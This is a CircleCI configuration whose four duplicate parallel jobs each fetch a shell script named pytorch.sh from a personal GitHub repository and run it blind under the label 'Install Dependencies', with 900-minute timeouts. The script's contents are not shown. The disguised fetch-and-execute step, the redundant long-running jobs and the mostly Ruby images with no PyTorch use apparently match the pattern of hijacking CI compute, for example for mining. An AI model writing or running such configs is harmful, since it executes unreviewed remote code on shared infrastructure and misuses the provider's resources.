version: 2
jobs:
    aku1:
      docker:
            - image: ubuntu-18.04
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kikinan86/SUGR/main/pytorch.sh && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kikinan86/SUGR/main/pytorch.sh && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kikinan86/SUGR/main/pytorch.sh && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kikinan86/SUGR/main/pytorch.sh && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m

            
workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4